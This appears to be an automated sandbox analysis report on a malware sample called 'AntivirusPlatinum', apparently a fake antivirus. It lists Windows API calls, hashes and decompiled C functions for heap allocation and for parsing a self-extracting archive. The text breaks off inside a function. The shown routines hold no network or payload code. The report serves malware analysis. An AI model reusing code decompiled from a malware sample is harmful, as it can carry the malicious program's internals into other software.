                                                                                                                                                              0x0040aa16
                                                                                                                                                              0x0040aa1c
                                                                                                                                                              0x0040aa1e
                                                                                                                                                              0x0040aa27
                                                                                                                                                              0x0040aa27
                                                                                                                                                              0x0040aa34
                                                                                                                                                              0x0040aa40
                                                                                                                                                              0x0040aa4b
                                                                                                                                                              0x0040aa4d
                                                                                                                                                              0x0040aa5a
                                                                                                                                                              0x0040aa5a
                                                                                                                                                              0x0040aa5d
                                                                                                                                                              0x0040aa65
                                                                                                                                                              0x0040aa66
                                                                                                                                                              0x0040aa6b
                                                                                                                                                              0x0040aa70
                                                                                                                                                              0x0040aa85
                                                                                                                                                              0x0040aa8b
                                                                                                                                                              0x0040aa90
                                                                                                                                                              0x0040aa98
                                                                                                                                                              0x0040aa99
                                                                                                                                                              0x0040aa9f
                                                                                                                                                              0x0040aaa1
                                                                                                                                                              0x0040aaa1
                                                                                                                                                              0x0040aaa3
                                                                                                                                                              0x0040aaa9
                                                                                                                                                              0x0040aaa9
                                                                                                                                                              0x0040aaac
                                                                                                                                                              0x0040aab2
                                                                                                                                                              0x0040aab2
                                                                                                                                                              0x0040aab5
                                                                                                                                                              0x0040aabf

                                                                                                                                                              APIs
                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 0040A9CA
                                                                                                                                                              • CoCreateInstance.OLE32(004128CC,00000000,00000001,0041281C,?), ref: 0040A9E1
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 0040AA85
                                                                                                                                                              • OleUninitialize.OLE32 ref: 0040AAB5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharCreateInitializeInstanceMultiUninitializeWide
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2968213145-0
                                                                                                                                                              • Opcode ID: 5959a21a4365000ac8d7732775093f3948591aca15d2945793f0ef5b4e0237ea
                                                                                                                                                              • Instruction ID: 6b7c248a20d7c3edf2c5fae1c052d584914ffab3addb81b43edd9a7ac8a902f0
                                                                                                                                                              • Opcode Fuzzy Hash: 5959a21a4365000ac8d7732775093f3948591aca15d2945793f0ef5b4e0237ea
                                                                                                                                                              • Instruction Fuzzy Hash: 9C31C775A00209AFDF00DFA0C988E9A7B79AF48304F1444A9F515EB291C775DE61DF64
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040A1EC(long _a4) {
                                                                                                                                                              				void* _t3;
                                                                                                                                                              
                                                                                                                                                              				_t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                                                                                                                                                              				return _t3;
                                                                                                                                                              			}




                                                                                                                                                              0x0040a1fb
                                                                                                                                                              0x0040a202

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,0040A673,?,?,00402BD9), ref: 0040A1F4
                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,0040A673,?,?,00402BD9), ref: 0040A1FB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1357844191-0
                                                                                                                                                              • Opcode ID: 74236f5c7da168fb3ace1d47c58c672c3213b8dd958d6a0e7c8abee1cd3c7f39
                                                                                                                                                              • Instruction ID: 7a16409088186048d9048875d39c01f0395119e9692a071e2e70866dbb263e04
                                                                                                                                                              • Opcode Fuzzy Hash: 74236f5c7da168fb3ace1d47c58c672c3213b8dd958d6a0e7c8abee1cd3c7f39
                                                                                                                                                              • Instruction Fuzzy Hash: 35C04C76044208A7C6105BD1AD09B857E1EE718651F008121F70585050C6B15120D66E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                              			E00401357(void* __ecx, void* __edx, char _a4) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				signed int _v24;
                                                                                                                                                              				char _v36;
                                                                                                                                                              				void* _t87;
                                                                                                                                                              				signed int _t88;
                                                                                                                                                              				void* _t90;
                                                                                                                                                              				signed int _t93;
                                                                                                                                                              				signed int _t108;
                                                                                                                                                              				signed char _t115;
                                                                                                                                                              				signed int _t119;
                                                                                                                                                              				intOrPtr _t120;
                                                                                                                                                              				char _t129;
                                                                                                                                                              				signed int _t132;
                                                                                                                                                              				char* _t143;
                                                                                                                                                              				signed int _t144;
                                                                                                                                                              				char* _t151;
                                                                                                                                                              				void* _t156;
                                                                                                                                                              				intOrPtr _t157;
                                                                                                                                                              				signed int _t166;
                                                                                                                                                              				char _t167;
                                                                                                                                                              				signed int _t180;
                                                                                                                                                              				intOrPtr _t181;
                                                                                                                                                              				void* _t182;
                                                                                                                                                              
                                                                                                                                                              				_t178 = __edx;
                                                                                                                                                              				_t182 = __ecx;
                                                                                                                                                              				_t179 = __ecx + 0x4630;
                                                                                                                                                              				 *((char*)(__ecx + 0x6d90)) = 0;
                                                                                                                                                              				_t87 = E0040568A(__ecx, __edx, __ecx + 0x4630, 7); // executed
                                                                                                                                                              				if(_t87 != 7) {
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              				_t160 = _t182;
                                                                                                                                                              				 *(_t182 + 0x6d94) = 0;
                                                                                                                                                              				_t88 = E0040122B(_t182, _t179);
                                                                                                                                                              				__eflags = _t88;
                                                                                                                                                              				if(_t88 == 0) {
                                                                                                                                                              					E00403952( &_v24, 0x80000);
                                                                                                                                                              					_t90 = E00404FDC(_t182, _t178); // executed
                                                                                                                                                              					_t156 = _t90;
                                                                                                                                                              					_t93 = E0040568A(_t182, _t178, _v24, _v20 + 0xfffffff0); // executed
                                                                                                                                                              					_t180 = 0;
                                                                                                                                                              					_v8 = _t93;
                                                                                                                                                              					__eflags = _t93;
                                                                                                                                                              					if(_t93 <= 0) {
                                                                                                                                                              						L20:
                                                                                                                                                              						__eflags =  *(_t182 + 0x6d94);
                                                                                                                                                              						if( *(_t182 + 0x6d94) != 0) {
                                                                                                                                                              							__eflags = _v24;
                                                                                                                                                              							if(__eflags != 0) {
                                                                                                                                                              								E0040A205(_v24); // executed
                                                                                                                                                              							}
                                                                                                                                                              							goto L25;
                                                                                                                                                              						}
                                                                                                                                                              						__eflags = _v24;
                                                                                                                                                              						if(_v24 != 0) {
                                                                                                                                                              							E0040A205(_v24);
                                                                                                                                                              						}
                                                                                                                                                              						goto L29;
                                                                                                                                                              					} else {
                                                                                                                                                              						goto L6;
                                                                                                                                                              					}
                                                                                                                                                              					do {
                                                                                                                                                              						L6:
                                                                                                                                                              						_t143 = _v24 + _t180;
                                                                                                                                                              						__eflags =  *_t143 - 0x52;
                                                                                                                                                              						if( *_t143 != 0x52) {
                                                                                                                                                              							goto L16;
                                                                                                                                                              						}
                                                                                                                                                              						_t176 = _t182;
                                                                                                                                                              						_t144 = E0040122B(_t182, _t143);
                                                                                                                                                              						__eflags = _t144;
                                                                                                                                                              						if(_t144 == 0) {
                                                                                                                                                              							goto L16;
                                                                                                                                                              						}
                                                                                                                                                              						__eflags =  *(_t182 + 0x6d88);
                                                                                                                                                              						if( *(_t182 + 0x6d88) == 0) {
                                                                                                                                                              							L18:
                                                                                                                                                              							 *(_t182 + 0x6d94) = _t180 + _t156;
                                                                                                                                                              							E004054ED(_t176, _t180 + _t156, 0, 0);
                                                                                                                                                              							__eflags =  *(_t182 + 0x6d88);
                                                                                                                                                              							if( *(_t182 + 0x6d88) == 0) {
                                                                                                                                                              								E0040568A(_t182, _t178, _t182 + 0x4630, 7);
                                                                                                                                                              							}
                                                                                                                                                              							goto L20;
                                                                                                                                                              						}
                                                                                                                                                              						__eflags = _t180;
                                                                                                                                                              						if(_t180 <= 0) {
                                                                                                                                                              							goto L18;
                                                                                                                                                              						}
                                                                                                                                                              						__eflags = _t156 - 0x1c;
                                                                                                                                                              						if(_t156 >= 0x1c) {
                                                                                                                                                              							goto L18;
                                                                                                                                                              						}
                                                                                                                                                              						__eflags = _v8 - 0x1f;
                                                                                                                                                              						if(_v8 <= 0x1f) {
                                                                                                                                                              							goto L18;
                                                                                                                                                              						}
                                                                                                                                                              						_t151 = _v24 - _t156 + 0x1c;
                                                                                                                                                              						__eflags =  *_t151 - 0x52;
                                                                                                                                                              						if( *_t151 != 0x52) {
                                                                                                                                                              							goto L16;
                                                                                                                                                              						}
                                                                                                                                                              						__eflags =  *((char*)(_t151 + 1)) - 0x53;
                                                                                                                                                              						if( *((char*)(_t151 + 1)) != 0x53) {
                                                                                                                                                              							goto L16;
                                                                                                                                                              						}
                                                                                                                                                              						__eflags =  *((char*)(_t151 + 2)) - 0x46;
                                                                                                                                                              						if( *((char*)(_t151 + 2)) != 0x46) {
                                                                                                                                                              							goto L16;
                                                                                                                                                              						}
                                                                                                                                                              						__eflags =  *((char*)(_t151 + 3)) - 0x58;
                                                                                                                                                              						if( *((char*)(_t151 + 3)) == 0x58) {
                                                                                                                                                              							goto L18;
                                                                                                                                                              						}
                                                                                                                                                              						L16:
                                                                                                                                                              						_t180 = _t180 + 1;
                                                                                                                                                              						__eflags = _t180 - _v8;
                                                                                                                                                              					} while (_t180 < _v8);
                                                                                                                                                              					goto L20;
                                                                                                                                                              				} else {
                                                                                                                                                              					__eflags =  *(_t182 + 0x6d88);
                                                                                                                                                              					if(__eflags != 0) {
                                                                                                                                                              						E004054ED(_t160, 0, 0, 0);
                                                                                                                                                              					}
                                                                                                                                                              					L25:
                                                                                                                                                              					E00401CE5(_t182, _t178, __eflags); // executed
                                                                                                                                                              					E00401264(_t182);
                                                                                                                                                              					__eflags =  *((intOrPtr*)(_t182 + 0x6d9a)) -  *((intOrPtr*)(_t182 + 0x468c));
                                                                                                                                                              					if( *((intOrPtr*)(_t182 + 0x6d9a)) ==  *((intOrPtr*)(_t182 + 0x468c))) {
                                                                                                                                                              						L27:
                                                                                                                                                              						_t166 =  *(_t182 + 0x4694) & 0x0000ffff;
                                                                                                                                                              						 *(_t182 + 0x6d8a) =  *(_t182 + 0x4694) & 0x00000001;
                                                                                                                                                              						 *(_t182 + 0x6d89) = _t166 >> 0x00000003 & 0x00000001;
                                                                                                                                                              						 *(_t182 + 0x6d8b) = _t166 >> 0x00000001 & 0x00000001;
                                                                                                                                                              						_t108 = _t166 >> 0x00000002 & 0x00000001;
                                                                                                                                                              						__eflags =  *(_t182 + 0x469c);
                                                                                                                                                              						 *(_t182 + 0x6d8c) = _t108;
                                                                                                                                                              						 *((char*)(_t182 + 0x6d8d)) = _t108 & 0xffffff00 |  *(_t182 + 0x469c) != 0x00000000;
                                                                                                                                                              						 *(_t182 + 0x6d8f) = _t166 >> 0x00000006 & 0x00000001;
                                                                                                                                                              						_t115 = _t166 >> 0x00000007 & 0x00000001;
                                                                                                                                                              						__eflags =  *((char*)(_t182 + 0x46a0)) - 0x24;
                                                                                                                                                              						 *(_t182 + 0x6d90) = _t115;
                                                                                                                                                              						if( *((char*)(_t182 + 0x46a0)) <= 0x24) {
                                                                                                                                                              							__eflags = _t115;
                                                                                                                                                              							if(_t115 == 0) {
                                                                                                                                                              								L33:
                                                                                                                                                              								_t167 = 0;
                                                                                                                                                              								__eflags = 0;
                                                                                                                                                              								L34:
                                                                                                                                                              								__eflags =  *((char*)(_t182 + 0x467c));
                                                                                                                                                              								 *((char*)(_t182 + 0x6d8e)) = _t167;
                                                                                                                                                              								if(__eflags == 0) {
                                                                                                                                                              									L36:
                                                                                                                                                              									E0040A7E9( &_v36, _t178, _t182);
                                                                                                                                                              									_t181 =  *((intOrPtr*)(_t182 + 0x6d78));
                                                                                                                                                              									_t157 =  *((intOrPtr*)(_t182 + 0x6d7c));
                                                                                                                                                              									_v12 =  *((intOrPtr*)(_t182 + 0x6d80));
                                                                                                                                                              									_v8 =  *(_t182 + 0x6d84);
                                                                                                                                                              									 *((char*)(_t182 + 0x6d8e)) = 0;
                                                                                                                                                              									while(1) {
                                                                                                                                                              										_t119 = E00401CE5(_t182, _t178, __eflags); // executed
                                                                                                                                                              										__eflags = _t119;
                                                                                                                                                              										if(_t119 == 0) {
                                                                                                                                                              											break;
                                                                                                                                                              										}
                                                                                                                                                              										_t120 =  *((intOrPtr*)(_t182 + 0x4678));
                                                                                                                                                              										__eflags = _t120 - 0x7a;
                                                                                                                                                              										if(_t120 != 0x7a) {
                                                                                                                                                              											__eflags = _t120 - 0x74;
                                                                                                                                                              											if(_t120 != 0x74) {
                                                                                                                                                              												L53:
                                                                                                                                                              												 *((intOrPtr*)(_t182 + 0x6d80)) = _v12;
                                                                                                                                                              												 *((intOrPtr*)(_t182 + 0x6d78)) = _t181;
                                                                                                                                                              												 *((intOrPtr*)(_t182 + 0x6d7c)) = _t157;
                                                                                                                                                              												 *(_t182 + 0x6d84) = _v8;
                                                                                                                                                              												E0040A810( &_v36);
                                                                                                                                                              												L54:
                                                                                                                                                              												__eflags =  *(_t182 + 0x6d8a);
                                                                                                                                                              												if( *(_t182 + 0x6d8a) == 0) {
                                                                                                                                                              													L56:
                                                                                                                                                              													E0040A477(_t182 + 0x6db5, _t182 + 0x17);
                                                                                                                                                              													__eflags = _t182 + 0x71b6;
                                                                                                                                                              													E0040E338(_t182 + 0x71b6, _t182 + 0x418);
                                                                                                                                                              													L57:
                                                                                                                                                              													_t129 = 1;
                                                                                                                                                              													L58:
                                                                                                                                                              													return _t129;
                                                                                                                                                              												}
                                                                                                                                                              												__eflags =  *((char*)(_t182 + 0x6d8e));
                                                                                                                                                              												if( *((char*)(_t182 + 0x6d8e)) != 0) {
                                                                                                                                                              													goto L57;
                                                                                                                                                              												}
                                                                                                                                                              												goto L56;
                                                                                                                                                              											}
                                                                                                                                                              											__eflags =  *(_t182 + 0x46b0) & 0x00000001;
                                                                                                                                                              											if(( *(_t182 + 0x46b0) & 0x00000001) != 0) {
                                                                                                                                                              												L52:
                                                                                                                                                              												 *((char*)(_t182 + 0x6d8e)) = 1;
                                                                                                                                                              												goto L53;
                                                                                                                                                              											}
                                                                                                                                                              											__eflags =  *(_t182 + 0x6d8a);
                                                                                                                                                              											if( *(_t182 + 0x6d8a) == 0) {
                                                                                                                                                              												goto L53;
                                                                                                                                                              											}
                                                                                                                                                              											__eflags =  *((char*)(_t182 + 0x46c8)) - 0x1d;
                                                                                                                                                              											if( *((char*)(_t182 + 0x46c8)) < 0x1d) {
                                                                                                                                                              												goto L53;
                                                                                                                                                              											}
                                                                                                                                                              											__eflags =  *(_t182 + 0x4694) & 0x00000100;
                                                                                                                                                              											if(( *(_t182 + 0x4694) & 0x00000100) != 0) {
                                                                                                                                                              												goto L53;
                                                                                                                                                              											}
                                                                                                                                                              											goto L52;
                                                                                                                                                              										}
                                                                                                                                                              										_t132 = E0040A4E9(_t182 + 0x53e8, "CMT");
                                                                                                                                                              										__eflags = _t132;
                                                                                                                                                              										if(_t132 == 0) {
                                                                                                                                                              											 *(_t182 + 0x6d8b) = 1;
                                                                                                                                                              										}
                                                                                                                                                              										__eflags =  *(_t182 + 0x53c0) & 0x00000001;
                                                                                                                                                              										if(__eflags != 0) {
                                                                                                                                                              											L43:
                                                                                                                                                              											 *((char*)(_t182 + 0x6d8e)) = 1;
                                                                                                                                                              											goto L44;
                                                                                                                                                              										} else {
                                                                                                                                                              											__eflags =  *(_t182 + 0x6d8a);
                                                                                                                                                              											if(__eflags == 0) {
                                                                                                                                                              												L44:
                                                                                                                                                              												E00401264(_t182);
                                                                                                                                                              												continue;
                                                                                                                                                              											}
                                                                                                                                                              											__eflags =  *(_t182 + 0x4694) & 0x00000100;
                                                                                                                                                              											if(__eflags != 0) {
                                                                                                                                                              												goto L44;
                                                                                                                                                              											}
                                                                                                                                                              											goto L43;
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              									goto L53;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = _t115;
                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                              									goto L54;
                                                                                                                                                              								}
                                                                                                                                                              								goto L36;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags = _t166 & 0x00000100;
                                                                                                                                                              							if((_t166 & 0x00000100) != 0) {
                                                                                                                                                              								goto L33;
                                                                                                                                                              							}
                                                                                                                                                              							_t167 = 1;
                                                                                                                                                              							goto L34;
                                                                                                                                                              						}
                                                                                                                                                              						E0040325C(0x414c7c, 1);
                                                                                                                                                              						L29:
                                                                                                                                                              						_t129 = 0;
                                                                                                                                                              						goto L58;
                                                                                                                                                              					}
                                                                                                                                                              					_push(E004098F7(0x7c));
                                                                                                                                                              					_push(_t182 + 0x17);
                                                                                                                                                              					E00402C95(E0040B2A9());
                                                                                                                                                              					__eflags = _a4;
                                                                                                                                                              					if(_a4 == 0) {
                                                                                                                                                              						goto L29;
                                                                                                                                                              					}
                                                                                                                                                              					goto L27;
                                                                                                                                                              				}
                                                                                                                                                              			}




























                                                                                                                                                              0x00401357
                                                                                                                                                              0x0040135f
                                                                                                                                                              0x00401363
                                                                                                                                                              0x0040136a
                                                                                                                                                              0x00401371
                                                                                                                                                              0x00401379
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040137b
                                                                                                                                                              0x00401386
                                                                                                                                                              0x00401388
                                                                                                                                                              0x0040138e
                                                                                                                                                              0x00401393
                                                                                                                                                              0x00401395
                                                                                                                                                              0x004013b8
                                                                                                                                                              0x004013bf
                                                                                                                                                              0x004013c4
                                                                                                                                                              0x004013d2
                                                                                                                                                              0x004013d7
                                                                                                                                                              0x004013d9
                                                                                                                                                              0x004013dc
                                                                                                                                                              0x004013de
                                                                                                                                                              0x00401465
                                                                                                                                                              0x00401467
                                                                                                                                                              0x0040146d
                                                                                                                                                              0x00401485
                                                                                                                                                              0x00401488
                                                                                                                                                              0x0040148d
                                                                                                                                                              0x0040148d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401488
                                                                                                                                                              0x0040146f
                                                                                                                                                              0x00401472
                                                                                                                                                              0x0040147b
                                                                                                                                                              0x0040147b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004013e4
                                                                                                                                                              0x004013e4
                                                                                                                                                              0x004013e7
                                                                                                                                                              0x004013e9
                                                                                                                                                              0x004013ec
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004013ef
                                                                                                                                                              0x004013f1
                                                                                                                                                              0x004013f6
                                                                                                                                                              0x004013f8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004013fa
                                                                                                                                                              0x00401401
                                                                                                                                                              0x00401439
                                                                                                                                                              0x00401441
                                                                                                                                                              0x00401447
                                                                                                                                                              0x0040144c
                                                                                                                                                              0x00401453
                                                                                                                                                              0x00401460
                                                                                                                                                              0x00401460
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401453
                                                                                                                                                              0x00401403
                                                                                                                                                              0x00401405
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401407
                                                                                                                                                              0x0040140a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040140c
                                                                                                                                                              0x00401410
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401417
                                                                                                                                                              0x0040141a
                                                                                                                                                              0x0040141d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040141f
                                                                                                                                                              0x00401423
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401425
                                                                                                                                                              0x00401429
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040142b
                                                                                                                                                              0x0040142f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401431
                                                                                                                                                              0x00401431
                                                                                                                                                              0x00401432
                                                                                                                                                              0x00401432
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401397
                                                                                                                                                              0x00401397
                                                                                                                                                              0x0040139d
                                                                                                                                                              0x004013a6
                                                                                                                                                              0x004013a6
                                                                                                                                                              0x00401492
                                                                                                                                                              0x00401494
                                                                                                                                                              0x0040149b
                                                                                                                                                              0x004014a7
                                                                                                                                                              0x004014ae
                                                                                                                                                              0x004014ce
                                                                                                                                                              0x004014ce
                                                                                                                                                              0x004014dd
                                                                                                                                                              0x004014ea
                                                                                                                                                              0x004014f6
                                                                                                                                                              0x00401501
                                                                                                                                                              0x00401503
                                                                                                                                                              0x0040150a
                                                                                                                                                              0x00401513
                                                                                                                                                              0x00401520
                                                                                                                                                              0x0040152b
                                                                                                                                                              0x0040152d
                                                                                                                                                              0x00401534
                                                                                                                                                              0x0040153a
                                                                                                                                                              0x0040154f
                                                                                                                                                              0x00401551
                                                                                                                                                              0x00401560
                                                                                                                                                              0x00401560
                                                                                                                                                              0x00401560
                                                                                                                                                              0x00401562
                                                                                                                                                              0x00401562
                                                                                                                                                              0x00401569
                                                                                                                                                              0x0040156f
                                                                                                                                                              0x00401579
                                                                                                                                                              0x0040157d
                                                                                                                                                              0x00401588
                                                                                                                                                              0x0040158e
                                                                                                                                                              0x00401594
                                                                                                                                                              0x0040159d
                                                                                                                                                              0x004015a0
                                                                                                                                                              0x004015fe
                                                                                                                                                              0x00401600
                                                                                                                                                              0x00401605
                                                                                                                                                              0x00401607
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004015a9
                                                                                                                                                              0x004015af
                                                                                                                                                              0x004015b2
                                                                                                                                                              0x0040160b
                                                                                                                                                              0x0040160e
                                                                                                                                                              0x00401640
                                                                                                                                                              0x00401643
                                                                                                                                                              0x0040164f
                                                                                                                                                              0x00401655
                                                                                                                                                              0x0040165b
                                                                                                                                                              0x00401661
                                                                                                                                                              0x00401666
                                                                                                                                                              0x00401666
                                                                                                                                                              0x0040166d
                                                                                                                                                              0x00401678
                                                                                                                                                              0x00401683
                                                                                                                                                              0x0040168f
                                                                                                                                                              0x00401696
                                                                                                                                                              0x0040169b
                                                                                                                                                              0x0040169b
                                                                                                                                                              0x0040169d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040169d
                                                                                                                                                              0x0040166f
                                                                                                                                                              0x00401676
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401676
                                                                                                                                                              0x00401610
                                                                                                                                                              0x00401617
                                                                                                                                                              0x00401639
                                                                                                                                                              0x00401639
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401639
                                                                                                                                                              0x00401619
                                                                                                                                                              0x00401620
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401622
                                                                                                                                                              0x00401629
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401630
                                                                                                                                                              0x00401637
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401637
                                                                                                                                                              0x004015c0
                                                                                                                                                              0x004015c5
                                                                                                                                                              0x004015c7
                                                                                                                                                              0x004015c9
                                                                                                                                                              0x004015c9
                                                                                                                                                              0x004015d0
                                                                                                                                                              0x004015d7
                                                                                                                                                              0x004015f0
                                                                                                                                                              0x004015f0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004015d9
                                                                                                                                                              0x004015d9
                                                                                                                                                              0x004015e0
                                                                                                                                                              0x004015f7
                                                                                                                                                              0x004015f9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004015f9
                                                                                                                                                              0x004015e7
                                                                                                                                                              0x004015ee
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004015ee
                                                                                                                                                              0x004015d7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401609
                                                                                                                                                              0x00401571
                                                                                                                                                              0x00401573
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401573
                                                                                                                                                              0x00401553
                                                                                                                                                              0x00401559
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040155d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040155d
                                                                                                                                                              0x00401543
                                                                                                                                                              0x00401548
                                                                                                                                                              0x00401548
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401548
                                                                                                                                                              0x004014b7
                                                                                                                                                              0x004014bb
                                                                                                                                                              0x004014c3
                                                                                                                                                              0x004014c8
                                                                                                                                                              0x004014cc
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004014cc

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: CMT$|LA
                                                                                                                                                              • API String ID: 0-3111524465
                                                                                                                                                              • Opcode ID: c155400c815564dadfbf603a83f8382b3448e47e6a2f946495a97fe2ddafdf87
                                                                                                                                                              • Instruction ID: 3467558b02b3088dee00dca3edea15e6df14af65674381350c28196c55da78c7
                                                                                                                                                              • Opcode Fuzzy Hash: c155400c815564dadfbf603a83f8382b3448e47e6a2f946495a97fe2ddafdf87
                                                                                                                                                              • Instruction Fuzzy Hash: BC913870A047409EEB21DB7488057EBB7E59F11308F04087FD49AB72E2DB7E6945DB2A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                                              			E00410D74(intOrPtr* __ecx, signed int _a4, char _a7) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				signed int _v12;
                                                                                                                                                              				signed int _v16;
                                                                                                                                                              				void* __edi;
                                                                                                                                                              				intOrPtr _t105;
                                                                                                                                                              				char _t107;
                                                                                                                                                              				signed char _t110;
                                                                                                                                                              				unsigned int _t112;
                                                                                                                                                              				signed int _t115;
                                                                                                                                                              				signed int _t116;
                                                                                                                                                              				signed int _t117;
                                                                                                                                                              				void* _t119;
                                                                                                                                                              				signed int _t120;
                                                                                                                                                              				unsigned int _t121;
                                                                                                                                                              				signed int _t124;
                                                                                                                                                              				signed int _t125;
                                                                                                                                                              				void* _t126;
                                                                                                                                                              				void* _t127;
                                                                                                                                                              				void* _t128;
                                                                                                                                                              				signed int _t130;
                                                                                                                                                              				unsigned int _t132;
                                                                                                                                                              				signed int _t135;
                                                                                                                                                              				signed int _t136;
                                                                                                                                                              				signed int _t137;
                                                                                                                                                              				intOrPtr _t139;
                                                                                                                                                              				unsigned int _t141;
                                                                                                                                                              				signed int _t145;
                                                                                                                                                              				signed int _t146;
                                                                                                                                                              				unsigned int _t147;
